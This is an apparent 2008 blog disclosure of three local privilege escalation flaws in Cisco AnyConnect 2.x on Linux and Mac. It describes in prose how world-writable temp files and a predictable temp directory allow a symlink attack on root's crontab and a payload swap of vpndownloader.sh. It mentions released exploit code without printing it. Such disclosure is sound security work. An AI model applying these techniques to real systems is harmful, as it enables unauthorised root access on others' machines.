Monday, December 22, 2008

Cisco AnyConnect 2.x Local Privilege Escalation

I have been holding on to these vulnerabilities for several months now. Cisco's AnyConnect VPN client, which provides VPN connectivity to Cisco's ASA using SSL, suffers from a number of security vulnerabilities that result in local privilege escalation on the Linux and Macintosh platforms. Versions 2.3.0185 and newer reportedly have had these issues remedied, but unfortunately I do not have the time or the resources any longer to validate the fixes.

Exploit code for Linux and Macintosh platforms is available, however the code is in an unknown state. At one point I had attempted to unify the code so that it would work regardless of where it was run, however I never got much further than the thought. Since I cannot validate the exploit code any further, the code is being release "as is".

There are three vulnerabilities on both platforms and the exploit techniques are similar if not identical.

Vulnerability #1: /tmp/routechangesv4.bin is written mode 666 (world readable and writable) every time AnyConnect is launched. Because it is never executed directly by AnyConnect, we must use its world writable goodness to achieve our goal. In this case, a simple symlink-attack to create a world-writable crontab for root into which we inject our commands is any easy approach.

Vulnerability #2: The /tmp/Temp8-Vpn2e8 directory used as part of the Java applet is not checked for existence prior to use and, since there is no randomness in the name, is easily tricked into utilizing our maliciously placed executables. When the Java applet runs, it creates and uses /tmp/Temp8-Vpn2e8 to drop vpndownloader.sh, which in turn (you guessed it!) downloads the remainder of the files needed to utilize the VPN. Exploitation is relatively straight forward -- create /tmp/Temp8-Vpn2e8 with permissions that we control, wait for vpndownloader.sh to be placed by the applet and then swap it out with our payload prior to the applet executing it.

Vulnerability #3: /tmp/vpn-uninstall.log is written mode 666, but I cannot recall if this happens only install, uninstall or at every launch. Exploit method is identical to the first vulnerability.

Thanks to Cisco's PSIRT for their help in getting these issues addressed.